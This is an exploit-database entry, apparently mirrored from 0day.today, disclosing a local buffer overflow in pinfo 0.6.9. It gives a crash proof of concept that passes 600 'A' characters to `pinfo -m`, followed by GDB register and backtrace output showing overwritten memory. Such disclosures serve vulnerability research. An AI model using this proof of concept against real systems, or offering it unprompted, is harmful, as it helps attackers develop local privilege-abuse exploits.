Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

pinfo 0.6.9 - Local Buffer Overflow Exploit

🗓️ 19 Apr 2017 00:00:00Reported by Nassim AsrirType 
zdt
 zdt🔗 0day.today👁 23 Views

pinfo v0.6.9 Local Buffer Overflow by Nassim Asrir at Henceforth, causing Segmentation Faul

Code
# Title: pinfo v0.6.9 - Local Buffer Overflow
# Author: Nassim Asrir
# Researcher at: Henceforth
# Author contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
# CVE: N/A
 
# Download #
 
$ apt-get install pinfo
 
# POC #
 
For any Question or discussion about this vuln: https://www.facebook.com/asrirnassim/ 
 
$ pinfo -m `python -c 'print "A"*600'`
Przemek's Info Viewer v0.6.9
Looking for man page...
 
Caught signal 11, bye!
Segmentation fault
 
 
# GDB Output #
 
$ gdb pinfo
 
(gdb) r -m `python -c 'print "A"*600'`
 
Program received signal SIGSEGV, Segmentation fault.
__GI_getenv (name=0x7ffff79831aa "RM") at getenv.c:84
84  getenv.c: No such file or directory.
 
(gdb) info registers 
rax            0x54 84
rbx            0x4141414141414141   4702111234474983745   <==== 
rcx            0x1a8    424
rdx            0x10 16
rsi            0x7fffffffdaae   140737488345774
rdi            0x7ffff79831a8   140737347334568
rbp            0x7fffffffe0a8   0x7fffffffe0a8
rsp            0x7fffffffda90   0x7fffffffda90   
r8             0x0  0
r9             0x20 32
r10            0x1ec    492
r11            0x7ffff796c630   140737347241520
r12            0x4554   17748
r13            0x4  4
r14            0x2  2
r15            0x7ffff79831aa   140737347334570
rip            0x7ffff73c911d   0x7ffff73c911d <__GI_getenv+173>
eflags         0x10206  [ PF IF RF ]
cs             0x33 51
ss             0x2b 43
ds             0x0  0
es             0x0  0
fs             0x0  0
gs             0x0  0
 
(gdb) where
#0  __GI_getenv (name=0x7ffff79831aa "RM") at getenv.c:84
#1  0x00007ffff796c661 in initscr () from /lib/x86_64-linux-gnu/libncursesw.so.5
#2  0x000055555556214a in ?? ()
#3  0x000055555555f165 in ?? ()
#4  0x0000555555557552 in ?? ()
#5  0x4141414141414141 in ?? ()
#6  0x4141414141414141 in ?? ()
#7  0x4141414141414141 in ?? ()
#8  0x4141414141414141 in ?? ()
#9  0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
#15 0x4141414141414141 in ?? ()
#16 0x4141414141414141 in ?? ()
#17 0x4141414141414141 in ?? ()
#18 0x4141414141414141 in ?? ()
#19 0x4141414141414141 in ?? ()
#20 0x4141414141414141 in ?? ()
#21 0x4141414141414141 in ?? ()
#22 0x4141414141414141 in ?? ()
#23 0x4141414141414141 in ?? ()
#24 0x4141414141414141 in ?? ()
#25 0x4141414141414141 in ?? ()
#26 0x4141414141414141 in ?? ()
#27 0x4141414141414141 in ?? ()
#28 0x4141414141414141 in ?? ()
#29 0x4141414141414141 in ?? ()
#30 0x4141414141414141 in ?? ()
#31 0x4141414141414141 in ?? ()
#32 0x4141414141414141 in ?? ()
#33 0x4141414141414141 in ?? ()
#34 0x4141414141414141 in ?? ()
#35 0x4141414141414141 in ?? ()
#36 0x4141414141414141 in ?? ()
#37 0x4141414141414141 in ?? ()
#38 0x4141414141414141 in ?? ()
#39 0x4141414141414141 in ?? ()
#40 0x4141414141414141 in ?? ()
#41 0x00007fffffff0020 in ?? ()
#42 0x00007fffffffebaa in ?? ()
---Type <return> to continue, or q <return> to quit---
#43 0x00007fffffffebc2 in ?? ()
#44 0x00007fffffffebd6 in ?? ()
#45 0x00007fffffffebe1 in ?? ()
#46 0x00007fffffffec07 in ?? ()
#47 0x00007fffffffec18 in ?? ()
#48 0x00007fffffffec48 in ?? ()
#49 0x00007fffffffec52 in ?? ()
#50 0x00007fffffffec73 in ?? ()
#51 0x00007fffffffec7d in ?? ()
#52 0x00007fffffffec86 in ?? ()
#53 0x00007fffffffec91 in ?? ()
#54 0x00007fffffffeca4 in ?? ()
#55 0x00007fffffffecb7 in ?? ()
#56 0x00007fffffffeccc in ?? ()
#57 0x00007fffffffed08 in ?? ()
#58 0x00007fffffffed33 in ?? ()
#59 0x00007fffffffed58 in ?? ()
#60 0x00007fffffffed63 in ?? ()
#61 0x00007fffffffed74 in ?? ()
#62 0x00007fffffffed84 in ?? ()
#63 0x00007fffffffed8f in ?? ()
#64 0x00007fffffffedc3 in ?? ()
#65 0x00007fffffffeddc in ?? ()
#66 0x00007fffffffee0d in ?? ()
#67 0x00007fffffffee30 in ?? ()
#68 0x00007fffffffee3f in ?? ()
#69 0x00007fffffffee47 in ?? ()
#70 0x00007fffffffee59 in ?? ()
#71 0x00007fffffffee75 in ?? ()
#72 0x00007fffffffee82 in ?? ()
#73 0x00007fffffffeeb5 in ?? ()
#74 0x00007fffffffeed1 in ?? ()
#75 0x00007fffffffeeee in ?? ()
#76 0x00007fffffffef28 in ?? ()
#77 0x00007fffffffef97 in ?? ()
#78 0x0000000000000000 in ?? ()

#  0day.today [2018-04-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Apr 2017 00:00Current
pinfobuffer overflownassim asrirhenceforthsegmentation fault
23